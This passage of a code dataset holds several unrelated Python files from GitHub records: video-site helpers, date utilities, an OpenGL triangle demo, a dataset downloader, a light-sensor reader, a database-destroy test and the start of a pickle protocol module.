'm3u8_url': 'm3u8_url:',\n        'download_with': '# download-with:',\n    }\n    if type == 'youku':\n        ts_key_list['size'] = 'size:'\n    for index in range(len(ts_list)):\n        new_ts_index_list = {}\n        it_var = ts_list[index]\n        if get_platform_str == \"windows\":\n            if len(it_var.split(\"\\r\\n\")) > 1:\n                ts_it_var = it_var.split(\"\\r\\n\")\n            else:\n                ts_it_var = it_var.split(\"\\n\")\n        else:\n            ts_it_var 
= it_var.split(\"\\n\")\n        for ts_it_var_index in range(len(ts_it_var)):\n            ts_it_var_str = ts_it_var[ts_it_var_index]\n            for ts_val, ts_key in ts_key_list.items():\n                if ts_it_var_str.find(ts_key) >= 0:\n                    new_ts_index_list[ts_val] = replace_trim(ts_key, ts_it_var_str)\n        if len(new_ts_index_list) > 0:\n            new_ts_list[new_ts_index_list['format']] = new_ts_index_list\n    return new_ts_list\n\n\n# print data as formatted JSON\ndef pJson(data):\n    p(json.dumps(data, ensure_ascii=False, indent=1))\n\n\n# read the code from code.txt\ndef getCode():\n    code_path = os.getcwd() + '/code.txt'\n    code_path = code_path.replace(\"\\\\\", '/')\n    f = open(code_path, 'r')\n    return f.read()\n\n\n# write a log entry\ndef myLog(txt, logPath=None, logName='mylog'):\n    if logPath is None:\n        logPath = os.getcwd() + '/runtime/log/' + time.strftime(\"%Y/%m/%d\", time.localtime())\n    # create the log folder\n    video_mkdir(logPath)\n    log = Log(__name__, logPath=logPath, logName=logName).getlog()\n    log.info(txt)\n\n\n# create a folder\ndef video_mkdir(path):\n    # strip leading and trailing spaces\n    path = path.strip()\n    # strip a trailing \\ character\n    path = path.rstrip(\"\\\\\")\n    # check whether the path exists\n    # exists -> True\n    # does not exist -> False\n    isExists = os.path.exists(path)\n    # act on the result\n    if not isExists:\n        # create the directory if it does not exist\n        # directory creation call\n        os.makedirs(path)\n        return True\n    else:\n        # the directory already exists, so do not create it again\n        return False\n\n\n# map a type id to its parent type id\ndef get_pid(type_id):\n    type_list = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 1, 7: 1, 8: 1, 9: 1, 10: 1, 11: 1, 12: 1, 13: 2, 14: 2, 15: 2,\n                 16: 2, 17: 5, 18: 5, 19: 4, 20: 4, 21: 4, 22: 4, 23: 23, 24: 2, 25: 3, 26: 3, 27: 3, 28: 3}\n    return type_list[type_id]\n\n\n# check whether a file or folder exists\ndef is_mkdir(path, type=1):\n    # strip leading and trailing spaces\n    path = path.strip()\n    # strip a trailing \\ character\n    path = path.rstrip(\"\\\\\")\n    # check whether the path exists\n    if type == 1:\n        isExists = os.path.exists(path)\n    else:\n        isExists = os.path.isdir(path)\n    # returns False when it does not exist\n    if not isExists:\n        return False\n    else:\n        return True\n\n\n# check whether a file exists\ndef is_file(path):\n    # strip leading and trailing spaces\n    path = path.strip()\n    # strip a trailing \\ character\n    path = path.rstrip(\"\\\\\")\n    # check whether the path exists\n    isExists = os.path.isfile(path)\n    # returns False when it does not exist\n    if not isExists:\n        return False\n    else:\n        return True\n\n\n# extract a single column as a list\ndef array_column_one(result, key):\n    return list(map(lambda x: x[key], result))\n\n\n# extract a column from a list of dicts, optionally keyed by index_key\ndef array_column(result, column=None, index_key=None):\n    new_result = {}\n    for result_index in range(len(result)):\n        result_str = result[result_index]\n        if column is None and index_key is not None:\n            new_result[result_str[index_key]] = result_str\n        elif column is not None and index_key is not None:\n            new_result[result_str[index_key]] = result_str[column]\n        else:\n            new_result[result_index] = result_str[column]\n    return new_result\n\n\n# split a list into chunks of the given size\ndef array_chunk(arr, size):\n    s = []\n    for i in range(0, int(len(arr)) + 1, size):\n        c = arr[i:i + size]\n        if c:\n            s.append(c)\n    return s\n\n\n# list the .ts/.m3u8 files in a folder\ndef file_name(file_dir, new_vod_url_str=''):\n    L = []\n    for root, dirs, files in os.walk(file_dir):\n        for file in files:\n            if os.path.splitext(file)[1] == '.ts' or os.path.splitext(file)[1] == '.m3u8':\n                if new_vod_url_str != '':\n                    L.append(os.path.join(new_vod_url_str, file))\n                else:\n                    L.append(os.path.join(root, file))\n    return L\n\n\n# list the files in a folder\ndef file_name_list(file_dir, new_vod_url_str='', type=None):\n    L = []\n    for root, dirs, files in os.walk(file_dir):\n        for file in files:\n            if type is not None:\n                if os.path.splitext(file)[1] != \"\" and str(os.path.splitext(file)[0])[0] != \".\":\n                    if new_vod_url_str != '':\n                        
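                        # prefix the entry with the given URL base instead of\n                        # the local directory path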
L.append(os.path.join(new_vod_url_str, file))\n                    else:\n                        L.append(os.path.join(root, file))\n            else:\n                if new_vod_url_str != '':\n                    L.append(os.path.join(new_vod_url_str, file))\n                else:\n                    L.append(os.path.join(root, file))\n    return L\n\n\n# assemble the video record fields\ndef get_vod_video(result):\n    new_video_install = {}\n    new_video_install['type_pid'] = result['type_id_1']\n    new_video_install['type_id'] = result['type_id']\n    new_video_install['vod_name'] = result['vod_name']\n    new_video_install['vod_sub'] = result['vod_sub']\n    new_video_install['vod_en'] = result['vod_en']\n    new_video_install['vod_tag'] = result['vod_en']\n    tag = result[\"vod_tag\"]\n    if len(tag) < 2:\n        tag = result[\"vod_class\"]\n    new_video_install[\"vod_tag\"] = tag\n    new_video_install[\"vod_pic\"] = result[\"vod_pic\"]\n    new_video_install[\"vod_pic_thumb\"] = result[\"vod_pic_thumb\"]\n    new_video_install[\"vod_pic_slide\"] = result[\"vod_pic_slide\"]\n    new_video_install[\"vod_actor\"] = result[\"vod_actor\"]\n    new_video_install[\"vod_director\"] = result[\"vod_director\"]\n    new_video_install[\"vod_writer\"] = result[\"vod_writer\"]\n    new_video_install[\"vod_behind\"] = result[\"vod_behind\"]\n    if len(result[\"vod_content\"]) > len(result[\"vod_blurb\"]):\n        new_video_install[\"vod_blurb\"] = result[\"vod_content\"]\n    else:\n        new_video_install[\"vod_blurb\"] = result[\"vod_blurb\"]\n    new_video_install[\"vod_remarks\"] = result[\"vod_remarks\"]\n    new_video_install[\"vod_pubdate\"] = result[\"vod_pubdate\"]\n    new_video_install[\"vod_total\"] = result[\"vod_total\"]\n    new_video_install[\"vod_serial\"] = result[\"vod_serial\"]\n    new_video_install[\"vod_tv\"] = result[\"vod_tv\"]\n    new_video_install[\"vod_weekday\"] = result[\"vod_weekday\"]\n    new_video_install[\"vod_area\"] = result[\"vod_area\"]\n    new_video_install[\"vod_lang\"] = result[\"vod_lang\"]\n    new_video_install[\"vod_year\"] = result[\"vod_year\"]\n    new_video_install[\"vod_version\"] = result[\"vod_version\"]\n    new_video_install[\"vod_state\"] = result[\"vod_state\"]\n    new_video_install[\"vod_duration\"] = result[\"vod_duration\"]\n    new_video_install[\"vod_isend\"] = result[\"vod_isend\"]\n    new_video_install[\"vod_douban_id\"] = result[\"vod_douban_id\"]\n    new_video_install[\"vod_douban_score\"] = result[\"vod_douban_score\"]\n    new_video_install[\"vod_time\"] = int(time.time())\n    new_video_install[\"vod_time_add\"] = int(time.time())\n    new_video_install[\"vod_id\"] = result[\"vod_id\"]\n    return new_video_install\n\n\n# write text to a file\ndef os_write(file_txt, txt):\n    file_ob = open(file_txt, \"w\")\n    file_ob.write(txt)\n    file_ob.close()\n\n\n# assemble the episode (collection) record fields\ndef get_vod_collection(install_video_id, result, like_collection, vod_url, like_path):\n    install_collection_data = {}\n    install_collection_data['video_id'] = install_video_id\n    install_collection_data[\"code\"] = getCode()\n    install_collection_data['title'] = '第' + str(like_collection) + '集'\n    install_collection_data['collection'] = int(like_collection)\n    install_collection_data['vod_url'] = vod_url\n    install_collection_data['duration'] = get_duration(like_path)\n    install_collection_data['resolution'] = ''\n    install_collection_data['bitrate'] = ''\n    install_collection_data['time_up'] = int(time.time())\n    install_collection_data['size'] = str(get_file_size(like_path))\n    install_collection_data['name'] = result['vod_name']\n    install_collection_data['director'] = result['vod_director']\n    return install_collection_data\n\n\n# read the total duration from an m3u8 file\ndef get_duration(path):\n    duration1 = float(0)\n    try:\n        get_time = float(0)\n        new_m3u8_file = f\"{path}/index.m3u8\"\n        print(new_m3u8_file)\n        with open(new_m3u8_file, 'r', encoding='UTF-8') as file_obj:\n            line_str = file_obj.read()\n            for line_index in 
line_str.split('\\n'):\n                line_index_str = replace_trim(\"\\n\", line_index)\n                if \"EXTINF\" in line_index_str:\n                    str1 = line_index_str.split(\":\")[1][:-1]\n                    if str1.endswith(','):\n                        time = float(str1[:-1])\n                    else:\n                        time = float(str1)\n                    get_time = get_time + time\n        duration1 = str(datetime.timedelta(seconds=get_time))\n        if '.' in duration1:\n            duration1 = duration1.split('.')[0]\n    except Exception as e:\n        pass\n    return duration1\n\n\n# total size of all files under a path\ndef get_file_size(filePath, size=0):\n    for root, dirs, files in os.walk(filePath):\n        for f in files:\n            size += os.path.getsize(os.path.join(root, f))\n    return size\n\n\ndef get_mg_header(referer_url=None, cookie=None):\n    mg_header = {\n        \"Referer\": referer_url,\n        \"User-Agent\": \"Mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/71.0.3578.98 safari/537.36\",\n        \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n        \"Accept-Charset\": \"UTF-8,*;q=0.5\",\n        \"Cookie\": cookie,\n        \"Accept-Encoding\": \"gzip,deflate,sdch\",\n        \"Accept-Language\": \"en-US,en;q=0.8\",\n    }\n    if cookie is None:\n        del mg_header['Cookie']\n    if referer_url is None:\n        del mg_header['Referer']\n    return mg_header\n\n\n# remove a directory tree (clearing read-only flags first)\ndef misc_init(filePath):\n    if is_mkdir(filePath):\n        if os.path.exists(filePath):\n            for fileList in os.walk(filePath):\n                for name in fileList[2]:\n                    os.chmod(os.path.join(fileList[0], name), stat.S_IWRITE)\n                    os.remove(os.path.join(fileList[0], name))\n            shutil.rmtree(filePath, True)\n        return True\n    else:\n        return False\n\n\n# test whether a string represents a number\ndef is_number(s):\n    try:\n        float(s)\n        return True\n    except ValueError:\n        pass\n    try:\n        import unicodedata\n        unicodedata.numeric(s)\n        return True\n    except (TypeError, ValueError):\n        pass\n    return False\n\n\n# log\ndef common_print_log(str, logName='myLog', logPath=None):\n    print(str)\n    myLog(str, logPath=logPath, logName=logName)\n\n\n# convert a timestamp in seconds to a formatted time string\ndef getTime(seconds):\n    timeArray = time.localtime(seconds)\n    otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n    return otherStyleTime\n\n\n# convert a formatted time string to a timestamp in seconds\ndef composeTime(time1):\n    time2 = datetime.datetime.strptime(time1, \"%Y-%m-%d %H:%M:%S\")\n    time3 = time.mktime(time2.timetuple())\n    time4 = int(time3)\n    return time4\n","repo_name":"litcas/video","sub_path":"upimage/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":12990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74562664426","text":"import calendar\nimport datetime\nimport decimal\nimport re\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom typing import Iterator, Optional\n\nfrom base import constants\n\n\nclass KgDate:\n    \"\"\"\n    A date class that is more ergonomic to use than ``datetime.date``.\n    \"\"\"\n\n    def __init__(self, *, year: int, month: int, day: Optional[int] = None) -> None:\n        self.year = year\n        self.month = month\n        self.day = day\n\n    def replace(\n        self,\n        *,\n        year: Optional[int] = None,\n        month: Optional[int] = None,\n        day: Optional[int] = None,\n    ) -> \"KgDate\":\n        if year is None:\n            year = self.year\n\n        if month is None:\n            month = self.month\n\n        if day is None:\n            day = self.day\n\n        return KgDate(year=year, month=month, day=day)\n\n    def plus(self, *, years: int = 0, months: int = 0, days: int = 0) -> \"KgDate\":\n        if years != 0:\n            if months != 0 or days != 0:\n                raise ValueError\n\n            return KgDate(year=self.year + years, month=self.month, day=self.day)\n\n        if months != 0:\n            if days != 0:\n                raise ValueError\n\n            # Subtract 1 before the divmod and add it back afterwards so the\n            # month stays in the range 1..12 (the same trick used in `minus`).\n            year_increment, month = 
divmod(self.month + months - 1, 12)\n            return KgDate(\n                year=self.year + year_increment, month=month + 1, day=self.day\n            )\n\n        if days != 0:\n            if days >= 28:\n                raise ValueError\n\n            if self.day is None:\n                raise ValueError\n\n            days_in_month = get_days_in_month(self.year, self.month)\n            if self.day + days > days_in_month:\n                new_day = (self.day + days) - days_in_month\n                if self.month == 12:\n                    return KgDate(year=self.year + 1, month=1, day=new_day)\n                else:\n                    return KgDate(year=self.year, month=self.month + 1, day=new_day)\n            else:\n                return KgDate(year=self.year, month=self.month, day=self.day + days)\n\n        return self\n\n    def minus(self, *, years: int = 0, months: int = 0, days: int = 0) -> \"KgDate\":\n        if years != 0:\n            if months != 0 or days != 0:\n                raise ValueError\n\n            return KgDate(year=self.year - years, month=self.month, day=self.day)\n\n        if months != 0:\n            if days != 0:\n                raise ValueError\n\n            # We have to subtract 1 from `months` and then add it back again so that\n            # the modular arithmetic works.\n            year_increment, month = divmod(self.month - months - 1, 12)\n            return KgDate(\n                year=self.year + year_increment, month=month + 1, day=self.day\n            )\n\n        if days != 0:\n            if days >= 28:\n                raise ValueError\n\n            if self.day is None:\n                raise ValueError\n\n            if self.day - days < 1:\n                days_in_previous_month = (\n                    get_days_in_month(self.year - 1, 1)\n                    if self.month == 1\n                    else get_days_in_month(self.year, self.month - 1)\n                )\n                new_day = days_in_previous_month + (self.day - days)\n                if self.month == 1:\n                    return KgDate(year=self.year - 1, month=12, day=new_day)\n                else:\n                    return KgDate(year=self.year, month=self.month - 1, day=new_day)\n            else:\n                return KgDate(year=self.year, month=self.month, day=self.day - days)\n\n        return self\n\n    def isoformat(self) -> str:\n        if self.day is not None:\n            return f\"{self.year}-{self.month:0>2}-{self.day:0>2}\"\n        else:\n            return f\"{self.year}-{self.month:0>2}\"\n\n    def as_sql_pattern(self) -> str:\n        if self.day is not None:\n            return self.isoformat()\n        else:\n            return self.isoformat() + \"%\"\n\n    def __eq__(self, other) -> bool:\n        if isinstance(other, datetime.date):\n            return (\n                self.year == other.year\n                and self.month == other.month\n                and (self.day is None or self.day == other.day)\n            )\n        elif isinstance(other, KgDate):\n            return (\n                self.year == other.year\n                and self.month == other.month\n                and self.day == other.day\n            )\n        else:\n            return NotImplemented\n\n    def __repr__(self) -> str:\n        if self.day is not None:\n            return f\"KgDate(year={self.year}, month={self.month}, day={self.day})\"\n        else:\n            return f\"KgDate(year={self.year}, month={self.month})\"\n\n    def __str__(self) -> str:\n        return self.isoformat()\n\n\ndef time_to_minutes(t: datetime.time, *, normalize_pm: bool = False) -> int:\n    \"\"\"\n    Returns the number of minutes since midnight for the ``datetime.time`` object.\n\n    :param normalize_pm: If true, then morning times are treated as happening after\n        afternoon and evening times instead of before.\n    \"\"\"\n    return t.hour * 60 + t.minute + (24 * 60 if normalize_pm and t.hour < 12 else 0)\n\n\ndef within_range(\n    month: datetime.date, start: datetime.date, end: datetime.date\n) -> bool:\n    \"\"\"\n    Returns true if any day of the range ``start`` to ``end`` is in the given month.\n\n    The ``day`` field of ``month`` is ignored.\n    \"\"\"\n    month_start = datetime.date(month.year, month.month, 1)\n    ndays = get_days_in_month(month.year, month.month)\n    month_end = datetime.date(month.year, month.month, ndays)\n    return 0 < count_days_of_overlap(month_start, month_end, start, end)\n\n\ndef 
get_days_in_month(year: int, month: int) -> int:\n \"\"\"\n Returns the number of days in the month.\n \"\"\"\n return calendar.monthrange(year, month)[1]\n\n\ndef count_days_of_overlap(\n start1: datetime.date,\n end1: Optional[datetime.date],\n start2: datetime.date,\n end2: Optional[datetime.date],\n):\n \"\"\"\n Returns the number of days that fall between both ranges.\n\n One range or the other may be open-ended (with an `end` of None), but not both.\n\n The endpoints are included in the count of days.\n \"\"\"\n assert end1 is None or start1 <= end1\n assert end2 is None or start2 <= end2\n assert not (end1 is None and end2 is None)\n\n start = max(start1, start2)\n end = min(end1, end2) if end1 and end2 else end1 or end2\n assert isinstance(end, datetime.date)\n return (end - start).days + 1 if start <= end else 0\n\n\ndef get_today_adjusted() -> datetime.date:\n \"\"\"\n Returns the current date, adjusted so that early morning times count as the previous\n day.\n\n In most cases this should be used in preference to ``datetime.date.today()``.\n \"\"\"\n now = datetime.datetime.now()\n if now.hour < 5:\n return now.date() - datetime.timedelta(days=1)\n else:\n return now.date()\n\n\ndate_pattern = re.compile(r\"^([0-9]{4})-([0-9]{2})(-([0-9]{2}))?$\")\ntime_pattern = re.compile(r\"^([0-9]{1,2}):([0-9]{2})(:([0-9]{2}))?$\")\n\n\ndef parse_date(s: str) -> datetime.date:\n \"\"\"\n Parses a date in ``YYYY-MM-DD`` format into a ``datetime.date`` object.\n\n The day is optional and defaults to 1 if not specified.\n\n Raises ``ValueError`` if the date is not correctly formatted.\n \"\"\"\n # Based on https://github.com/django/django/blob/master/django/utils/dateparse.py\n m = date_pattern.match(s)\n if m:\n year = int(m.group(1))\n month = int(m.group(2))\n day = int(m.group(4)) if m.group(4) else 1\n return datetime.date(year=year, month=month, day=day)\n else:\n raise ValueError(s)\n\n\ndef parse_time(s: str) -> datetime.time:\n \"\"\"\n Parses a time in ``HH:MM:SS`` into a ``datetime.time`` object.\n\n The second is optional and defaults to 0 if not specified. 
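For example, ``parse_time(\"9:30\")`` returns ``datetime.time(9, 30, 0)``, since the second defaults to 0.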
The leading digit of the\n hours may be omitted if it is '0'.\n\n Raises ``ValueError`` if the time is not correctly formatted.\n \"\"\"\n # Based on https://github.com/django/django/blob/master/django/utils/dateparse.py\n m = time_pattern.match(s)\n if m:\n hour = int(m.group(1))\n minute = int(m.group(2))\n second = int(m.group(4)) if m.group(4) else 0\n return datetime.time(hour=hour, minute=minute, second=second)\n else:\n raise ValueError(s)\n\n\ndef format_time(t: datetime.time) -> str:\n \"\"\"\n Returns the conventional human representation of a ``datetime.time`` object.\n \"\"\"\n # The hex code A0 is for the non-breaking space.\n return t.strftime(\"%I:%M\\xa0%p\").lstrip(\"0\")\n\n\ndef remove_prefix(string: str, prefix: str) -> str:\n \"\"\"\n If ``string`` begins with ``prefix``, returns ``string`` with ``prefix`` removed;\n otherwise returns ``string`` unchanged.\n \"\"\"\n return string[len(prefix) :] if string.startswith(prefix) else string\n\n\ndef remove_suffix(string: str, suffix: str) -> str:\n \"\"\"\n If ``string`` ends with ``suffix``, returns ``string`` with ``suffix`` removed;\n otherwise returns ``string`` unchanged.\n \"\"\"\n return string[: -len(suffix)] if string.endswith(suffix) else string\n\n\ndef get_short_file_path(path: str) -> str:\n \"\"\"\n Returns the short version of a file path, or the file path unchanged if it is not\n in ``constants.FILES``.\n \"\"\"\n return remove_prefix(path, constants.FILES + \"/\")\n\n\ndef snake_case(s: str) -> str:\n \"\"\"\n Converts an identifier from camel case to snake case.\n \"\"\"\n\n def snake_case_replacer(match):\n text = match.group(0)\n return text[0] + \"_\" + text[1]\n\n name = re.sub(r\"[a-z][A-Z]\", snake_case_replacer, s)\n return name.lower()\n\n\ndef date_range(start: datetime.date, end: datetime.date) -> Iterator[datetime.date]:\n \"\"\"\n Yields successive dates in the inclusive range from ``start`` to ``end``.\n \"\"\"\n it = start\n while it <= end:\n yield it\n it += datetime.timedelta(days=1)\n\n\nMONTHS_TO_INDICES = {\n \"january\": 1,\n \"february\": 2,\n \"march\": 3,\n \"april\": 4,\n \"may\": 5,\n \"june\": 6,\n \"july\": 7,\n \"august\": 8,\n \"september\": 9,\n \"october\": 10,\n \"november\": 11,\n \"december\": 12,\n}\n\n\nclass CustomJSONEncoder(DjangoJSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n\n return super().default(o)\n","repo_name":"iafisher/khaganate-snapshot","sub_path":"base/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29968970866","text":"import pygame as pg\nfrom OpenGL.GL import *\nimport numpy as np\nimport ctypes\nfrom OpenGL.GL.shaders import compileProgram, compileShader\n\nclass App:\n\n\n def __init__(self):\n\n # Inicializa o Pygame\n pg.init()\n pg.display.set_mode((640, 480), pg.OPENGL | pg.DOUBLEBUF)\n self.clock = pg.time.Clock()\n # Inicializa o OpenGL\n glClearColor(1, 0.2, 0.2, 1.0)\n\n # Cria o shader\n self.shader = self.createShader('shaders/vertex.txt', 'shaders/fragment.txt')\n glUseProgram(self.shader)\n\n # Cria triangulo\n self.triangulo = Triangulo()\n\n self.mainLoop()\n\n def createShader(self, vertexFilepath, fragmentFilepath):\n\n with open(vertexFilepath, 'r') as f:\n vertex_src = f.read()\n\n with open(fragmentFilepath, 'r') as f:\n fragment_src = f.read()\n\n shader = compileProgram(\n compileShader(vertex_src, GL_VERTEX_SHADER),\n compileShader(fragment_src, 
GL_FRAGMENT_SHADER)\n )\n\n return shader\n\n # Loop principal do jogo\n def mainLoop(self):\n\n running = True\n while running:\n # verifica eventos\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n\n # limpa a tela\n glClear(GL_COLOR_BUFFER_BIT)\n\n # desenha o triangulo\n glUseProgram(self.shader)\n glBindVertexArray(self.triangulo.vao)\n glDrawArrays(GL_TRIANGLES, 0, self.triangulo.vertex_count)\n pg.display.flip()\n\n # limita a 60 fps\n self.clock.tick(60)\n\n self.quit()\n\n # Finaliza o jogo\n def quit(self):\n self.triangle.destroy()\n glDeleteProgram(self.shader)\n pg.quit()\n\nclass Triangulo:\n\n def __init__(self):\n \n # x, y, z, r, g, b\n self.vertices = (\n -0.5, -0.5, 0.0, 1.0, 0.0, 0.0,\n 0.5, -0.5, 0.0, 0.0, 1.0, 0.0,\n 0.0, 0.5, 0.0, 0.0, 0.0, 1.0\n )\n\n self.vertices = np.array(self.vertices, dtype=np.float32)\n\n self.vertex_count = 3\n\n self.vao = glGenVertexArrays(1)\n glBindVertexArray(self.vao)\n self.vbo = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, self.vertices.nbytes, self.vertices, GL_STATIC_DRAW)\n # position\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 24, ctypes.c_void_p(0))\n # color\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 3, GL_FLOAT, GL_FALSE, 24, ctypes.c_void_p(12))\n\n def destroy(self):\n glDeleteVertexArrays(1, (self.vao))\n glDeleteBuffers(1, (self.vbo))\n\n\nif __name__ == '__main__':\n App()\n","repo_name":"DeivisFelipe/OpenGL-Python","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17260507030","text":"import glob\nimport json\nimport math\nimport os\n\nimport requests\n\nURL = \"https://klacansky.com/open-scivis-datasets/datasets.json\"\nSIZE_LIMIT_MB = 1024\n\n\ndef get_datasets_urls(size_limit_mb):\n req = requests.get(URL)\n datasets_json = json.loads(req.text)\n\n dtype_size = {\n \"uint8\": 1,\n \"int16\": 2,\n \"uint16\": 2,\n \"float32\": 4,\n \"float64\": 8,\n }\n\n return [\n dataset[\"url\"]\n for dataset in datasets_json.values()\n if math.prod(dataset[\"size\"]) * dtype_size[dataset[\"type\"]]\n < (size_limit_mb * 1e6)\n ]\n\n\ndef download_file(url, dest):\n # https://stackoverflow.com/questions/16694907/download-large-file-in-python-with-requests\n with requests.get(url, stream=True) as req:\n with open(dest, \"wb\") as dst:\n for chunk in req.iter_content(chunk_size=8192):\n dst.write(chunk)\n print(f\"Downloaded {dest} from {url}\")\n\n\ndef download_dataset(dataset_url, dest_dir=\"\"):\n dataset_name = dataset_url.split(\"/\")[-1]\n if dest_dir + dataset_name in glob.glob(dest_dir + \"*.raw\"):\n print(f\"{dataset_name} already downloaded, skipping...\")\n return\n download_file(dataset_url, dest_dir + dataset_name)\n\n\ndef main(max_size=SIZE_LIMIT_MB):\n dest_dir = \"raws\"\n try:\n os.mkdir(dest_dir)\n except FileExistsError:\n pass\n\n ds_urls = get_datasets_urls(max_size)\n for url in ds_urls:\n download_dataset(url, dest_dir + \"/\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pierre-guillou/pdiags_bench","sub_path":"download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20431344366","text":"#!/usr/bin/python\n#---------------------------------------------------------------------\n# 
___ ___ _ ____\n# / _ \\/ _ \\(_) __/__ __ __\n# / , _/ ___/ /\\ \\/ _ \\/ // /\n# /_/|_/_/ /_/___/ .__/\\_, /\n# /_/ /___/\n#\n# bh1750.py\n# Read data from a BH1750 digital light sensor.\n#\n# Author : Matt Hawkins\n# Date : 26/06/2018\n#\n# For more information please visit :\n# https://www.raspberrypi-spy.co.uk/?s=bh1750\n#\n#---------------------------------------------------------------------\nfrom smbus2 import SMBus\nimport time\nimport threading\nimport LightControl.CustomException as CustomException\nimport LightControl.LightSetting as LightSetting\nimport concurrent.futures\n\nclass MeasureLux():\n def __init__(self):\n self.lux = 0\n \n # Define some constants from the datasheet\n self.DEVICE = 0x23 # Default device I2C address\n\n self.POWER_DOWN = 0x00 # No active state\n self.POWER_ON = 0x01 # Power on\n self.RESET = 0x07 # Reset data register value\n\n # Start measurement at 4lx resolution. Time typically 16ms.\n self.CONTINUOUS_LOW_RES_MODE = 0x13\n # Start measurement at 1lx resolution. Time typically 120ms\n self.CONTINUOUS_HIGH_RES_MODE_1 = 0x10\n # Start measurement at 0.5lx resolution. Time typically 120ms\n self.CONTINUOUS_HIGH_RES_MODE_2 = 0x11\n # Start measurement at 1lx resolution. Time typically 120ms\n # Device is automatically set to Power Down after measurement.\n self.ONE_TIME_HIGH_RES_MODE_1 = 0x20\n # Start measurement at 0.5lx resolution. Time typically 120ms\n # Device is automatically set to Power Down after measurement.\n self.ONE_TIME_HIGH_RES_MODE_2 = 0x21\n # Start measurement at 1lx resolution. Time typically 120ms\n # Device is automatically set to Power Down after measurement.\n self.ONE_TIME_LOW_RES_MODE = 0x23\n\n #bus = smbus.SMBus(0) # Rev 1 Pi uses 0\n #self.bus = SMBus(1) # Rev 2 Pi uses 1\n\n def convertToNumber(self,data):\n # Simple function to convert 2 bytes of data\n # into a decimal number. Optional parameter 'decimals'\n # will round to specified number of decimal places.\n # result=(data[1] + (256 * data[0])) / 1.2. window influence 고려하여 0.4 나누기로 수정\n result=(data[1] + (256 * data[0])) / 0.51\n return (result)\n\n def readLight(self):\n # Read data from I2C interface\n self.bus = SMBus(1) # Rev 2 Pi uses 1\n addr=self.DEVICE\n data = self.bus.read_i2c_block_data(addr,self.ONE_TIME_HIGH_RES_MODE_1,2)\n #read_i2c_blocak_data는 데이터를 1개의 블록(여기서는 list로 처리)로 읽어온다.\n #첫 parameter는 i2c address, 두번째 것은 데이터를 가져올 register 주소인데, 여기서는 정확도 별로 register를 골라쓴다.\n #세번째 것은 읽어올 block의 길이다. 여기서는 2byte를 읽어온다. 
반환되는 데이터는 byte로 된 리스트이다.\n \n return self.convertToNumber(data)\n\n def measureLux(self):\n self.lux = int(self.readLight())\n #print(\"측정된 조도 : \" + format(self.lux,'.2f') + \" lx\")\n #time.sleep(0.5)\n return self.lux\n if self.stop_threads:\n raise CustomException.MeasureLuxTerminate\n\ndef work(lightSetting):\n lightSetting.lux = 999\n\nif __name__==\"__main__\":\n global lightSetting\n lightSetting = LightSetting.LightSetting()\n m = MeasureLux()\n\n lightSetting.lux = m.measureLux()\n print('lightSetting.lux :', lightSetting.lux)\n work(lightSetting)\n print('lightSetting.lux :', lightSetting.lux)\n","repo_name":"rkrnru/2021ESWContest_free_1071","sub_path":"LightControl/measureLux.py","file_name":"measureLux.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20715583377","text":"\"\"\"\nThis test is intended to be executed as second-last, just before the re-init test\n(this is why it is prefixed as zzz1)\nBeware: if env TEST_DESTROY_MODE == 1 this test will destroy your database, be careful\n\"\"\"\nimport os\n\nimport pytest\n\nfrom restapi.connectors import Connector\nfrom restapi.exceptions import ServiceUnavailable\nfrom restapi.server import ServerModes, create_app\nfrom restapi.services.authentication import BaseAuthentication\n\n\n# Only executed if tests are run with --destroy flag\n@pytest.mark.skipif(\n not Connector.check_availability(\"authentication\")\n or os.getenv(\"TEST_DESTROY_MODE\", \"0\") != \"1\",\n reason=\"This test needs authentication and TEST_DESTROY_MODE to be enabled\",\n)\ndef test_destroy() -> None:\n auth = Connector.get_authentication_instance()\n\n user = auth.get_user(username=BaseAuthentication.default_user)\n assert user is not None\n\n create_app(name=\"Flask Tests\", mode=ServerModes.DESTROY, options={})\n\n if Connector.check_availability(\"sqlalchemy\"):\n with pytest.raises(ServiceUnavailable):\n auth = Connector.get_authentication_instance()\n user = auth.get_user(username=BaseAuthentication.default_user)\n else:\n auth = Connector.get_authentication_instance()\n user = auth.get_user(username=BaseAuthentication.default_user)\n assert user is None\n","repo_name":"rapydo/http-api","sub_path":"tests/base/test_zzz1_destroy.py","file_name":"test_zzz1_destroy.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"69978121067","text":"import pickle\nfrom socket import socket\nfrom src.protocols.CDProtoBadFormat import CDProtoBadFormat\nfrom src.protocols.Serializer import Serializer\n \n\nclass Pickle_P:\n\n @classmethod\n def send_msg(cls, connection: socket, msg):\n #Sends through a connection a Message object.\n\n serialize = Serializer.PICKLE.value\n serialize = serialize.to_bytes(1, 'big')\n messageToSend = pickle.dumps(msg.getMessage());\n messageSize = len(messageToSend)\n\n 